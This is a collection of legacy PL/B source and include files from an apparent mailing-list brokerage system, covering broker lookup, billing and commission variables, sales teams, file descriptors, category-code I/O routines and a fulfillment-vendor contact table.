DISPLAY *SETSWALL TOPWIND:BOTWIND:LWIND:RWIND;
KEYIN *P1:1,*ES:
*P1:6,*EL,"I WILL HELP YOU FIND THE Broker NUMBER",*R:
*P1:6,*EL,"THAT YOU WANT":
*R,*P1:6;
goto ffloat
MOVE "01L" TO str3
KEYbrk KEYIN *P1:1,*ES,"TYPE IN Broker NAME : ":
*P1:2,*DV,brCOMP:
*P1:2,*T60,*EDIT,brCOMP
MOVE brcomp TO STR24
CMATCH "*" IN brcomp
GOTO brkAEXT1 IF EQUAL
KEYIN *P1:2,*DV,brcomp,*P1:3,"OK ? ",*T60,STR1:
*P1:3,*EL;
CMATCH NO TO STR1
GOTO KEYbrk IF EQUAL
CMATCH B1 TO brcomp
GOTO notnof IF EQUAL
GOTO notnof IF EOS
MATCH "01L" TO str3
GOTO packb1 IF EQUAL
PACK nbrkfld2 FROM str3,brcomp
CALL chkbkey
GOTO brkEADA
packb1 PACK nbrkfld2 FROM str3,brcomp,QUEStion,question,question
CALL chkbkey
GOTO brkEADA
ffloat MOVE "01F" TO str3
GOTO KEYbrk
brkEADA
CLEAR brknum
MOVE "*****NO brknum FOUND*****" TO brcomp
CALL NbrkAIM
IF OVER
MOVE "*****NO brknum FOUND*****" TO brcomp
GOTO brkAEXIT
clear str4
clear brknum
else
MOVE brknum TO STR4
ENDIF
GOTO DISbrkA
chkbkey MOVELPTR nbrkfld2 TO n2
GOTO notnof IF ZERO
COMPARE C6 TO n2
GOTO notnof IF LESS *NOT ENOUGH INFO, LET THEM KNOW
RETURN *OK, RETURN
brkEADA1 CLEAR brknum
MOVE "*****NO brknum FOUND*****" TO brcomp
CALL NbrkKG
IF OVER
. MOVE STR24 TO brcomp
clear brfax
GOTO brkAEXIT
ENDIF
MATCH brknum TO STR4
GOTO brkEADA1 IF EQUAL
MOVE brknum TO STR4
GOTO DISbrkA
brkEADA2 CLEAR brknum
MOVE "*****NO brknum FOUND*****" TO brcomp
IFZ PC
CALL NbrkKGP
XIF
IF OVER
. MOVE STR24 TO brcomp
GOTO brkAEXIT
ENDIF
MATCH brknum TO STR4
GOTO brkEADA2 IF EQUAL
MOVE brknum TO STR4
GOTO DISbrkA
DISbrkA DISPLAY *P1:6,*EL,"##",brknum," ",brcntct:
*p8:7,brcomp;
ENDSET brcomp
IFZ PC
KEYIN *P1:5,"ENTER TO CONTINUE, (P)rior (*) TO END",*T254,STR1;
XIF
IFNZ PC
KEYIN *P1:5,"ENTER TO CONTINUE (*) TO END",*T254,STR1;
XIF
CMATCH STAR TO STR1
GOTO brkAEXT1 IF EQUAL
CMATCH "P" TO STR1
GOTO brkEADA2 IF EQUAL
GOTO brkEADA1
.............................................................................
notnof DISPLAY *P1:24,*BLINKON,*HON,*EL,"NOT ENOUGH INFO TO SEARCH":
*HOFF;
GOTO brkHELP
.............................................................................
brkAEXIT
clear brknum
MOVE YES TO OVER
brkAEXT1 DISPLAY *P1:1,*ES,*RESETSW:
*P20:24,*HON,"ENTER (*) TO EXIT, (<) TO BACKUP":
" or (?) FOR HELP",*HOFF;
. MOVE STR24 TO brcomp
RETURN
................
bsetWIN MOVE "18" TO TOPWIND NO VALUES GIVEN,SET TO DEFAULTS
MOVE C24 TO BOTWIND
MOVE "40" TO LWIND
MOVE C80 TO RWIND
RETURN
............................................................................
<file_sep>/include/consacct.inc
..............................................................................
.
. CONSacct INCLUSION
.
. DEFINES ALL CONSTANT AND FREQUENTLY USED VARIABLES.
. for accounting programs specifically compute.inc
.
.Patch 1.68 JD 08Apr08 added 12781 Oglala Lakota to Rateten.
.Patch 1.67 JD 01Mar07 added 17865 Interfaith Alliance to rateten.
.Patch 1.66 DLH 12Jul06 Zero out Dawson & Epsilon Mailer vars
.patch #1.65 JD 08Jul05 Removed Unicef/Now escrow mailers.
.patch #1.64 JD 07Oct04 added # 21716 & 21703 to Rateten.
.patch #1.63 JD 21May04 added # 21558/20998 to Rateten.
.patch #1.62 JD 29Apr04 Removed Pop Conn 6476 from Rateten.
.patch #1.61 JD 13Apr04 <NAME> added to RateTen
.patch #1.60 JD 11Mar04 Mass Demo added to RateTen
.patch #1.59 DLH 15Dec03 add PFLAG tp RateTen
.patch #1.58 JD 18jul03 removed DNC from escmlrs.
.patch #1.57 JD 25jun03 removed AHS from rateten.
.patch #1.56 JD 18apr03 added Girls Inc epsimlrs/added DNC/NOW/PPFA escrmlrs.
.patch #1.55 JD 18Nov02 added DNC rateten var.
.patch #1.52 JD 04mar02 added covemlr for rebate.
.patch #1.51 JD 11DEC01 added qtybildn USED best quantity on Net orders.
.patch #1.5 DLH 08Jul01 rateten moved here
.patch #1.4 JD 13JUL01 removed american humane escrow.
.patch #1.3 DLH 23Jun00 move vars here from ninv0001.pls
.patch #1.2 DLH 15Oct99 new vars to breakout $ savings and fee on nets
.patch #1.1 DLH 07Apr99 - NININV Y2K & new COMpute.inc
.Patch #1.0 ASH 29Dec98 - NINORD Y2K, File expansion: vars added for increase in Quantities
. <NAME> 11/10/94 Created
.
.begin Patch 1.2
grossbase form 9.2
netsavins form 9.2
netsavfee form 9.2
.end Patch 1.2
.begin patch ninv0001 version 10.0
GrossBaseSR form 9.2 gross base on rental portion (split rental)
GrossBaseSE form 9.2 gross base on Exchange portion (split Exchange)
.end patch ninv0001 version 10.0
.Start Patch #1.0 - increased vars
.SELECT FORM 7.2
.TAXES FORM 7.2
.FORMAP2 FORM 7.2
.SAVEAP FORM 7.2
.LRINC FORM 7.2
.NININC FORM 7.2
.AMOUNT FORM 7.4
.AMOUNTX FORM 7.4
.CANUSE FORM 7.4 CANADIAN USE TAX
.GROSS FORM 7.2
.SHIP FORM 7.2
.CMPCOM FORM 7.2
.BRKCOM FORM 7.2
.AP FORM 7.2
.FLOAMT FORM 7.2
.SVECOM FORM 7.4
.PREPAY FORM 7.2
.FORMAR FORM 7.2
.SVEACR FORM 7.2
.ACAMT FORM 7.2
...
SELECT FORM 9.2
TAXES FORM 9.2
PRICE FORM 3.2 -not changed
PRICEx FORM 3.2 -not changed
FORMAP2 FORM 9.2
FORMAP3 FORM 9.2
SAVEAP FORM 9.2
LRINCX FORM 9.2 recovered commission on net orders
LRINC FORM 9.2
NININC FORM 9.2
XNININC FORM 9.2
AMOUNTr FORM 7.4 -not changed
AMOUNT FORM 9.4
AMOUNTx FORM 9.4
CANUSE FORM 9.4 CANADIAN USE TAX
GROSS FORM 9.2
argh94 FORM 9.4 .dlh 09Aug99 for commission on gross names on a net order
Grossar FORM 9.2 .DLH 22Jun99 for commission on gross names
. on a net order.
SHIP FORM 9.2
POST FORM 3.2 -not changed
CMPCOM FORM 9.2
BRKCOM FORM 9.2
AP FORM 9.2
FLOAMT FORM 9.2
SVECOM FORM 9.4
PREPAY FORM 9.2
FORMAR FORM 9.2
SVEACR FORM 9.2
.End Patch #1.0 - increased vars
.Start patch #1.0 - new vars added
FORM92 FORM 9.2
FORM93 FORM 9.3
FormNineTwo1 FORM 9.2
FormNineTwo2 FORM 9.2
FORM94 FORM 9.4
.End patch #1.0 - new vars added
.Start patch #1.0 - new vars to replace current vars
.I LEFT REPLACED VARS INTACT IN CASE THEY NEED TO BE USED ELSEWHERE.
.HOWEVER, NOTE THAT COMPUTE.INC NO LONGER USES THEM BUT INSTEAD
.USES THE FOLLOWING REPLACEMENTS!!!!
CMPT92 FORM 9.2 .replaces FORM72
CMPT94 FORM 9.4 .replaces FORM74
CMPT94X FORM 9.4 .replaces FORM74X
CMPT94A FORM 9.4 .replaces FORM74A
NET94 FORM 9.4 .replaces NET74
NET94N FORM 9.4 .replaces NET74N
.End patch #1.0 - new vars to replace current vars
.begin Invoice patch 10.001
Form34 Form 3.4
.end Invoice patch 10.001
FORM32 FORM 3.2
FORM72 FORM 7.2
FORM72x FORM 7.2 .split
FORM73 FORM 7.3
net74 FORM 7.4 .for net name orders
net74n FORM 7.4 .for net name orders save field.
form74a form 7.4
FORM74r FORM 7.4
FORM74 FORM 7.4
FORM74x FORM 7.4 .split
FORM82 FORM 8.2
CALCRUN FORM 9.2
RUNAR FORM 9.2 TOTAL ADDITIONAL TDMC RUNNING CHARGES AR.
RUNLR FORM 9.2 TOTAL COMMISION FROM RUNNING CHARGES.
RUNPASS FORM 9.2 TOTAL PASSED THROUGH TO TDMC.
RUNFLAT FORM 9.2 ALL NON-RUN CHARGES. IE MAG TAPE.
RUNRAR FORM 9.2 TOTAL ADDITIONAL TDMC RUNNING CHARGES AR.
RUNRLR FORM 9.2 TOTAL COMMISION FROM RUNNING CHARGES.
RUNRPASS FORM 9.2 TOTAL PASSED THROUGH TO TDMC.
RUNRFLAT FORM 9.2 ALL NON-RUN CHARGES. IE MAG TAPE.
RUNRCNT FORM 5
RUNFLAG DIM 1 HOLDS STAR IF TDMC RUNNING CHARGES INVOLVED
RUNCOUNT FORM 5
netflag form 1 1=gross order 2=net
.begin patch 1.1
.CODENUM FORM 2
.ADDKEY DIM 2
.ADDCODE DIM 2
CODENUM FORM 3
ADDKEY DIM 3
ADDCODE DIM 3
nacd1flag form 1 0=normal, 1=addcode '001' was encounterd
.end patch 1.1
.STR14 DIM 14 turned offset 14mar2001 jd conflicted with cons.inc
.Start Patch #1.0 - increased vars
.ACAMT FORM 7.2
ACAMT FORM 9.2
.end Patch #1.0 - increased vars
.begin patch 1.1
ordteflag DIM 1 yes = ORDER DATE after 7/1/99
NINVFRMFLAG FORM 1 1=MAILER, 2=mlr remitance, 3=OWNER/manager
NINVOUTFLAG FORM 1 0= no detail 1=PRT detail from compute 2=Display Detail
TOTREJ FORM 8
.ADDITIONAL CHARGE DESCRIPTION.
.
addcd1 dim 3 used in ninv0001 for display
addcd2 dim 3
addcd3 dim 3
addcd4 dim 3
addcd5 dim 3
addcd6 dim 3
addcd7 dim 3
addcd8 dim 3
addcd9 dim 3
addcd10 dim 3
addncd1 dim 3 used in ninv0001 for display
addncd2 dim 3
addncd3 dim 3
addncd4 dim 3
addncd5 dim 3
addncd6 dim 3
addncd7 dim 3
addncd8 dim 3
addncd9 dim 3
addncd10 dim 3
.begin patch nadj0001 1.4
addAext1 Dim 1
addAext2 Dim 1
addAext3 Dim 1
addAext4 Dim 1
addAext5 Dim 1
addAext6 Dim 1
addAext7 Dim 1
addAext8 Dim 1
addAext9 Dim 1
addAext10 Dim 1
.end patch nadj0001 1.4
.addP1 dim 3 used in ninv0001 for display
.addP2 dim 3
.addP3 dim 3
.addP4 dim 3
.addP5 dim 3
.addP6 dim 3
.addP7 dim 3
.addP8 dim 3
.addP9 dim 3
.addP10 dim 3
addP1 dim 4 used in ninv0001 for display
addP2 dim 4
addP3 dim 4
addP4 dim 4
addP5 dim 4
addP6 dim 4
addP7 dim 4
addP8 dim 4
addP9 dim 4
addP10 dim 4
ADDESC1 DIM 35
ADDESC2 DIM 35
ADDESC3 DIM 35
ADDESC4 DIM 35
ADDESC5 DIM 35
ADDESC6 DIM 35
ADDESC7 DIM 35
ADDESC8 DIM 35
ADDESC9 DIM 35
ADDESC10 DIM 35
.
ATPRT DIM 1
AT1 DIM 1 ADDITION CHARGE PRINT LINE VAR.
AT2 DIM 1 ADDITION CHARGE PRINT LINE VAR.
AT3 DIM 1 ADDITION CHARGE PRINT LINE VAR.
AT4 DIM 1 ADDITION CHARGE PRINT LINE VAR.
AT5 DIM 1 ADDITION CHARGE PRINT LINE VAR.
AT6 DIM 1 ADDITION CHARGE PRINT LINE VAR.
AT7 DIM 1 ADDITION CHARGE PRINT LINE VAR.
AT8 DIM 1 ADDITION CHARGE PRINT LINE VAR.
AT9 DIM 1 ADDITION CHARGE PRINT LINE VAR.
AT10 DIM 1 ADDITION CHARGE PRINT LINE VAR.
.
.begin patch
.qty for charge
addqty DIM 9
addqty1 DIM 9
addqty2 DIM 9
addqty3 DIM 9
addqty4 DIM 9
addqty5 DIM 9
addqty6 DIM 9
addqty7 DIM 9
addqty8 DIM 9
addqty9 DIM 9
addqty10 DIM 9
.end patch
.ADDITIONAL CHARGE RATE.
.
ADD$RTE DIM 6
ADD$RT1 DIM 6
ADD$RT2 DIM 6
ADD$RT3 DIM 6
ADD$RT4 DIM 6
ADD$RT5 DIM 6
ADD$RT6 DIM 6
ADD$RT7 DIM 6
ADD$RT8 DIM 6
ADD$RT9 DIM 6
ADD$RT10 DIM 6
.
. TOTAL ADDITIONAL CHARGE
.
ADD$1 DIM 15
ADD$2 DIM 15
ADD$3 DIM 15
ADD$4 DIM 15
ADD$5 DIM 15
ADD$6 DIM 15
ADD$7 DIM 15
ADD$8 DIM 15
ADD$9 DIM 15
ADD$10 DIM 15
.end patch 1.1.
ACCMPR FORM 3.2
NewACCMPR FORM 3.4 for new compute 03 June 2003 DLH
AEXTCD DIM 1 ;10Sep2003 dlh - for Nadj0001 release 1.4
.AEXTCD --- if 1=use & an adjustment call go calc use original qtybild for calc, else use adj qty
ANINCD FORM 1
THOUS FORM "1000"
HUND FORM "100"
INDEX FORM 2
ppsw dim 1
PREPAYSW DIM 1 =Y IF PREPAY $
CMREFLAG FORM 1 0=NO 1=YES
CMREDOLR FORM 9.12
fulhouse init "TDMC-ANACAPA-EPSILON-PERLOWIN-LPS"
subppsw dim 1 -if yes handle prepays.
TDMCFLAG FORM 1 2=DO TDMC CALCS.
.begin patch 1.3
.dawsmlrs init "0036"
dawsmlrs init "0000"
covemlr init "0396"
EpsiMLrs INit "0000"
.epsimlrs init "2702-0904-1762-1604-0024-6319-3083-3852-0093-4417-9374-1403-5759"
.epsimlrs init "2702-0904-1762-1604-0024-6319-3083-3852-0093-4417-9374-1403"
.escrmlrs init "1498-0774-0308-5838-1921-2661"
.escrmlrs init "1498-0774-5838-1921-2661"
.escrmlrs init "1498-0774-1921-0073-0071-0076"
.escrmlrs init "1498-0774-1921-0073-0076-0055"
.begin patch 1.65
escrmlrs init "1498-0774-1921-0076"
.begin patch 1.65
rebate FORM 9.4
.end patch 1.3
.begin patch 1.5 moved to consacct.inc 8/8/01
.begin patch 1.59
.RATETEN INIT "005172-016291-016533-018246-018678-019534-018575-006476-004493-011947" $10 EXCHANGE MAN FEE LISTS
.RATETEN INIT "005172-016291-016533-018246-018678-019534-018575-006476-004493-011947-014841" $10 EXCHANGE MAN FEE LISTS
.RATETEN INIT "005172-016291-016533-018246-018678-019534-018575-006476-004493-011947-014841-020887" $10 EXCHANGE MAN FEE LISTS
.RATETEN INIT "005172-016291-016533-018246-018678-019534-018575-006476-004493-011947-014841-020887-011278" $10 EXCHANGE MAN FEE LISTS
.RATETEN INIT "005172-016291-016533-018246-018678-019534-018575-004493-011947-014841-020887-011278-021558-020998" $10 EXCHANGE MAN FEE LISTS
.begin patch 1.64
.RATETEN INIT "005172-016291-016533-018246-018678-019534-018575-004493-011947-014841-020887-011278-021558-020998-021716-021703" $10 EXCHANGE MAN FEE LISTS
.end patch 1.64
.begin patch 1.67
;RATETEN INIT "005172-016291-016533-018246-018678-019534-018575-004493-011947-014841-020887-011278-021558-020998-021716-021703-017865" $10 EXCHANGE MAN FEE LISTS
.end patch 1.67
.begin patch 1.68
RATETEN INIT "005172-016291-016533-018246-018678-019534-018575-004493-011947-014841-020887-011278-021558-020998-021716-021703-017865-012781" $10 EXCHANGE MAN FEE LISTS
.end patch 1.68
.end patch 1.59
qtybildn FORM 9
.added dec 2002 --- for JOse
chgrqty form 9
CALCPER FORM 9
PER85 FORM "000.85"
CHGQTY1 FORM 8
CHGQTY2 FORM 9
.begin adj patch 1.4
RunChrgTot form 9.2
HoldRunChrg form 9.2
OrigQtyBild Form 9
QtyAdjFlag Dim 1 .if yes qty adjutment routine is calling compute
FrcCompFlag Dim 1 .IF set to "Y" force Recompute of previously billed order
.end adj patch 1.4
.added KCET #004493 08/08/2001
..RATETEN INIT "005172-016291-016533-018246-018678-019534-018575-006476-014943" $10 EXCHANGE MAN FEE LISTS
.added Amer Humane #14943 04/11/2001
.RATETEN INIT "005172-016291-016533-018246-018678-019534-018575-006476" $10 EXCHANGE MAN FEE LISTS
..5172 planned parenthood
..16291 PP Voter fund
..16533 PP High Dollar
..18246 PP Action Fund
..18678 High dollar democrats master
..19534 La Raza
.added ZPG #18575 & 6476 02/02/2000
.added La Raza #19534 11/30/99
.removed UCS Sep 99 DLH
.RATETEN INIT "005172-016291-016533-018246-018678-005670" $10 EXCHANGE MAN FEE LISTS
.JUne 99 KCET rate reduced to $2 per SMM
.RATETEN INIT "004493-005172-016291-016533-018246-018678-005670" $10 EXCHANGE MAN FEE LISTS
. PP, KCET, UCS 9/1/98
.ncjw #015445 removed from list 9/24/98 DLH per SMM
.end patch 1.5
<file_sep>/include/Oslsteam.inc
; Last change: JD 4 May 2005 12:25 pm
; Last change: JD 25 Jan 1999 12:25 pm
*..............................................................................
* OSLSTEAMS/INC - ORDER SALES TEAMS TABLE. 01FEB89
*..............................................................................
.AUG312005 Replaced Suzie's Team with Ann's Team
.
OSLS0 INIT "NO SALESPERSON "
OSLS1 INIT "JEANETTE'S TEAM "
.OSLS2 INIT "REBECCA'S TEAM "
OSLS2 INIT "DELYNNE'S TEAM"
OSLS3 INIT "SUSAN'S TEAM"
OSLS4 INIT " "
.OSLS4 INIT "NANCY'S TEAM "
.OSLS5 INIT "BONNIE'S TEAM "
OSLS5 INIT " "
OSLS6 INIT "LIST MANAGEMENT "
OSLS7 INIT "ANN'S TEAM "
.OSLS7 INIT "SUZIE'S TEAM "
.OSLS8 INIT "COLD CALLS "
OSLS8 INIT " "
OSLS9 INIT " "
.OSLS9 INIT "EM's team "
.OSLS10 INIT "TIFFANY'S TEAM"
OSLS10 INIT " "
OSLS11 INIT " "
OSLS12 INIT " "
OSLS13 INIT " "
OSLS14 INIT " "
OSLS15 INIT " "
OSLS16 INIT " "
OSLS17 INIT " "
OSLS18 INIT " "
OSLS19 INIT " "
OSLS20 INIT " "
.OSLS21 INIT " "
.OSLS22 INIT " "
.OSLS23 INIT " "
.OSLS24 INIT " "
.OSLS25 INIT " "
.OSLS26 INIT " "
.OSLS27 INIT " "
.OSLS28 INIT " "
.OSLS29 INIT " "
...............................................................................
.ANY CHANGES IN THIS TABLE NEED TO WILL CHANGE TABLE IN Nord0011.dbs. AFTER
.PARAGRAPH READ2.
...............................................................................
<file_sep>/DEVELOP/Includes - why/naddBdd.inc
******************************************************
* NAddBDD INCLUSION
* SUBSIDIARY FILE FOR DATACARD
* ADDRESSING FILE DESCRIPTOR.
. ....................................................
* ****************************************************
* NAMES IN THE NEWS MASTER ADDRESSING FILE.
* ****************************************************
; release 1.1 2005 June 18 DMB - Changed IP of File Manager
.
. FILE: NINAddB
. LENGTH: 20
. TYPE: AIM,ISAM,MANAGED
. INDEX KEY: 1-9 NAddBLIST + NAddBNUM
.AIMDEX KEY: 1-6 NAddBLIST
......................................................
NAddBNAME INIT "NINAddB"
.>Patch 1.1 Begin
NAddBFLIST FILELIST
NAddBFILE IFILE KEYLEN=9,FIXED=37,Name="NINAddB.isi|NINS1:502"
NAddBFLE2 AFILE FIXED=37,Name="NINAddB.aam|NINS1:502"
FILELISTEND
.>Patch 1.1 End
.
NAddBLOCK FORM 1 0 OR 1=filepi,2=recordlock, 3=no lock
NAddBFLD DIM 9
NAddBFLD1 DIM 9
NAddBFLAG FORM 1
NAddBPATH FORM 1
.
NAddBVARS LIST
NAddBLIST DIM 6 1-6 LIST NUMBER
NAddBNUM DIM 3 7-9 ADDRESS CODE NUMBER
NAddBPRICE FORM 5.2 10-17 SELECTION CODE PRICE
NAddBDESC DIM 3 18-20 SELECTION CODE DESCRIPTION
NAddBStamp Dim 17 stamp of when backed up
. " " OR "000" NO DESCRIPTION/CALCULATION
. "001" /M
. "002" /FLAT
. "003" /EACH
. "004" /MIN
. "005" N/A
. "006" N/C
. "007" SEEBASE
. "008" SEEDESC
. "009" INQUIRE
LISTEND
<file_sep>/include/NCATCODEIO.INC
.....................................................................................
.
. NCATCODEIO INCLUSION
. NIN CATEGORY CODES FILE I/O ROUTINES
.
. FILE NAME : NINCODE
. REC LENGTH: 528 FIXED
. INDEX KEY : 1-6 NCATCODENUM (LIST NUM)
.AIMDEX KEYS: (1) XX-XX XXXX
. (2) XX-XX XXXXX
.
........................................................................................
.
.
. ENTRY POINT : NCATCODEKEY
. REQUIRED : NCATCODEFLD
. RETURNED : CATEGORY CODES RECORD
. DESCRIPTION : EXACT ISAM KEY READ
.
NCATCODEKEY
BRANCH NCATCODEFLAG, NCATCODE1 // if filelist already open, don't open again
call NCATCODEOPEN
NCATCODE1
TRAP IOMssg Giving Error if IO // set up error trap in case read fails
. FILEPI 1;NCATCODEFILE
READ NCATCODEFILE,NCATCODEFLD;NCATCODEVARS
TRAPCLR IO
RETURN
........................................................................................
.
. ENTRY POINT : NCATCODETST
. REQUIRED : NCATCODEFLD
. RETURNED :
. DESCRIPTION : TEST KEY
.
NCATCODETST
BRANCH NCATCODEFLAG, NCATCODE2 // if filelist already open, don't open again
call NCATCODEOPEN
NCATCODE2
TRAP IOMssg Giving Error if IO // set up error trap in case read fails
. FILEPI 1;NCATCODEFILE
READ NCATCODEFILE,NCATCODEFLD;;
TRAPCLR IO
RETURN
........................................................................................
.
. ENTRY POINT : NCATCODEWRT
. REQUIRED : NCATCODEFLD
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
NCATCODEWRT
BRANCH NCATCODEFLAG, NCATCODE3
CALL NCATCODEOPEN
NCATCODE3
TRAP IOMssg Giving Error if IO // in case write produces errors
FILEPI 1;NCATCODEFILE
WRITE NCATCODEFLIST;NCATCODEVARS
TRAPCLR IO
RETURN
..............................................................................................
. ENTRY POINT : NCATCODEUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE CATEGORY FILE
.
NCATCODEUPD
BRANCH NCATCODEFLAG, NCATCODE4
CALL NCATCODEOPEN
NCATCODE4
TRAP IOMssg Giving Error if IO
FILEPI 1;NCATCODEFLIST
UPDATE NCATCODEFLIST;NCATCODEVARS
TRAPCLR IO
RETURN
.
..................................................................................................
. ENTRY POINT : NCATCODEDEL
. REQUIRED : NCATCODEFLD
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
NCATCODEDEL
BRANCH NCATCODEFLAG TO NCATCODE5
CALL NCATCODEOPEN
NCATCODE5
CALL NCATCODETST
RETURN IF OVER
TRAP IOMssg Giving Error if IO
FILEPI 1;NCATCODEFLIST
DELETE NCATCODEFLIST
TRAPCLR IO
RETURN
.
....................................................................................................
. ENTRY POINT : NCATCODEAIM
. REQUIRED : NCATCODEFLD1,2,3,4,5,6,7,8
. RETURNED : CATCODE RECORD
. DESCRIPTION : AIM CATCODE FILE READ
.
NCATCODEAIM
BRANCH NCATCODEFLAG TO NCATCODE6
CALL NCATCODEOPEN
NCATCODE6
TRAP IOMssg Giving Error if IO
. FILEPI 1;NCATCODEFLE2
READ NCATCODEFLE2,NCATCODEFLD1,NCATCODEFLD2,NCATCODEFLD3,NCATCODEFLD4,NCATCODEFLD5,NCATCODEFLD6,NCATCODEFLD7,NCATCODEFLD8;NCATCODEVARS
TRAPCLR IO
RETURN
.
........................................................................................................
. ENTRY POINT : NCATCODEKG
. REQUIRED : VALID PREVIOUS AIM READ
. RETURNED : CATCODE RECORD
. DESCRIPTION : AIM KEY GENERIC CATCODE FILE READ
.
NCATCODEKG
BRANCH NCATCODEFLAG TO NCATCODE7
CALL NCATCODEOPEN
NCATCODE7
TRAP IOMssg Giving Error if IO
. FILEPI 1;NCATCODEFLE2
READKG NCATCODEFLE2;NCATCODEVARS
TRAPCLR IO
RETURN
.......................................................................................
.
. ENTRY POINT : NCATCODEOPEN
. REQUIRED : 'NCATCODEFLAG'
. RETURNED : 'NCATCODEFLAG' SET TO '1' IF OPENED
. DESCRIPTION : OPEN CATEGORY CODES FILES
. DISPLAY ERROR AND ABORT IF NOT ONLINE
.
NCATCODEOPEN
TRAP NCATCODEGONE giving Error if IO
OPEN NCATCODEFLIST .,EXCLUSIVE
TRAPCLR IO
MOVE C1, NCATCODEFLAG
RETURN
.
NCATCODEGONE
MOVE NCATCODENAME, FILENAME
CALL FILEGONE
.
............................................................................................
<file_sep>/include/MDC090DD.INC
.* MIN List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MIN DATACARD FILES.
.* ****************************************************
.
. FILE: MDC_M090
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: FLAT Comma Delimited
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Main file
.MDCMaindd
.Secondary FIles See
.MDCSEGDD - Segment info universe & $
.MDSMSCDD - Misc addressing Min, UOS,Gender,Media,net
.MDC090DD - CAtegory
.MDC091DD - Owner ???? data no supplied
.MDC090DD - Owner
.MDCTXTDD - Text
......................................................
M090NAME Init "MDC_090.isi|NINS1:502"
M090Flist FileLIst
M090FILE IFILE Name="MDC_090.isi|NINS1:502"
M090FILE2 AFILE Name="MDC_090.aam|NINS1:502"
FileListEnd
M090SFILE FILE
.M090SFILE FILE Name="MDC_090.csv"
M090Fld Dim 5
M090Fld2 Dim 28
M090FLAG FORM 1
M090PATH FORM 1
.
M090VARS LIST .for ease I am using Min's names
GKEY Dim 5 1-5 LO Code#
GNAM Dim 25 6-30 Name
GAD1 Dim 25 31-55 Address 1
GAD2 Dim 25 56-80 Address 2
GCTY Dim 20 81-100 City
GSTT Dim 2 101-102 State
GZIP Dim 10 103-112 Zip
GCTR Dim 25 113-137 Country
GCNT Dim 25 138-162 Contact
GPH1 Dim 11 163-173 Phone
GPH2 Dim 11 174-184 Phone
GPHF Dim 11 185-195 FAX
GPHM Dim 11 196-206 Modem
GDLT Dim 1 207-207 'A'ctive/'I'nactive
ListEnd
<file_sep>/include/fulfill.inc
; Last change: JD 16 Nov 2001 7:26 am
..04/23/02 DB add new fulfil28 Enertex Mktg
..04/03/02 DB updated PIDI fax #.
..11/19/01 DB updated PC DIR fax #.
..11/16/01 JD updated PIDI fax #.
..11/09/01 JD updated ful13/ful20 as well as their contact names.
..09/05/01 DB Changed Kable\Pub Aid Name, #,contact name
..07/30/01 DB Changed fulfill juliane/msgi to msgi/metro dir
..07/17/01 DB added new fulfil27 juliane/msgi dir
..03/13/01 DB Changed fulfil25 ATC From Anna h to Anna m
..01/05/00 ADDED NEW FULFIL 25 ATC
ful1 init "FIDE"
ful2 init "JETSON"
ful3 init "ANACAPA"
ful4 init "ANTARES"
ful5 init "SMALL PUB" SMALL PUBLISHERS
ful6 init "DTM" .note prob with 3 byte name pad to 4.
fuL7 init "PIDI"
ful8 init "EPSILON"
ful9 init "LIST MAINTENANC"
FUL10 INIT "KABLE"
.FUL10 INIT "KABLE/PUB. AID"
FUL11 INIT "THE FIDE GROUP"
FUL12 INIT "NATL SUBSC.FUL."
.FUL13 INIT "METRO SVC/LAURE"
FUL13 INIT "METRO SVC"
FUL14 INIT "NATL CONVSN SYS"
FUL15 INIT "DYNAMARK"
FUL16 INIT "IMI/INFO.MGT."
FUL17 INIT "PACIF.COAST DIR"
FUL18 INIT "INTERACTIVE SYS"
FUL19 INIT "DRCT ACCESS MKTG"
FUl20 init "METRO DIRECT"
FUl21 init "L & E MERIDIAN"
FUl22 init "<NAME>."
FUl23 init "FFA/CATHERINE"
FUl24 init "BLAEMIRE COMM."
FUl25 init "<NAME>./ATC"
FUl26 init "TDMC" .Currently used only by Program 1
FUL27 INIT "MSGI/METRO DIR"
FUL28 INIT "Enertex Mktg"
.
ovrTEL1 init "7737742975"
ovrTEL2 init "2033536661"
ovrTEL3 init "6124816363"
.
fulTEL1 init "8056858561"
fulTEL2 init "5169791960"
fulTEL3 init "8055660305"
fulTEL4 init "6312345472"
fulTEL5 init "3154379863" SMALL PUBLISHERS
fulTEL6 init "6305955361"
.fuLTEL7 init "7036835458"
fuLTEL7 init "7036839537"
fulTEL8 init "6172731359" EPSILON
fulTEL9 init "2035526799" LIST MAINTENANCE"
FULTEL10 INIT "8157345202" KABLE
.FULTEL10 INIT "8157341129" KABLE/PUB.AID"
fulTEL11 init "8056858561" THE FIDE GROUP
fulTEL12 init "7146939704" natl susbcription fulfillment.
FULTEL13 INIT "9173397164" METRO SVC/LAUREN .per CO 21Oct99 DLH
FULTEL14 INIT "7038470381" NATIONAL CONVERSION SYSTEMS 12/12/95 DLH
FULTEL15 INIT "2127857503" DYNAMARK 11/21/96 JD
FULTEL16 INIT "4084280715" IMI INFO MGMT
FULTEL17 INIT "5624329716" PACIF.COAST DIR
.FULTEL17 INIT "5624338935" PACIF.COAST DIR
FULTEL18 INIT "7032475445" INTERACTIVE SRVCS 12/02/98
FULTEL19 INIT "5163640644" Drct Access 08/12/99
FULTEL20 INIT "9173397163" Metro Drct 12/22/99 per SA
FULTEL21 INIT "7039137050" L & E Meridian 06/05/00 per SMM
FUltel22 init "5165644197" ARG/Richie
FUltel23 init "3015852595" FFA
FUltel24 init "7036205339" BLAEMIRE
FUltel25 init "3045352667" ATC
FUltel26 init "4153827088" TDMC .Currently used only by Program 1
FULTEL27 INIT "9173397164" MSGI/METRO DIRECT
FULTEL28 INIT "5106288313" ENERTEX MKTG
.
ovroct1 form 2 number of orders
ovroct2 form 2 number of orders
ovroct3 form 2 number of orders
.
fuloct1 form 2 number of orders
fuloct2 form 2 number of orders
fuloct3 form 2 number of orders
fuloct4 form 2 number of orders
fuloct5 form 2 number of orders
fuloct6 form 2 number of orders
fuloct7 form 2 number of orders
fuloct8 form 2 number of orders
fuloct9 form 2 number of orders
fuloct10 form 2 number of orders
fuloct11 form 2 number of orders
fuloct12 form 2 number of orders
fuloct13 form 2 number of orders
fuloct14 form 2
fuloct15 form 2
fuloct16 form 2
fuloct17 form 2
fuloct18 form 2
fuloct19 form 2
fuloct20 form 2
fuloct21 form 2
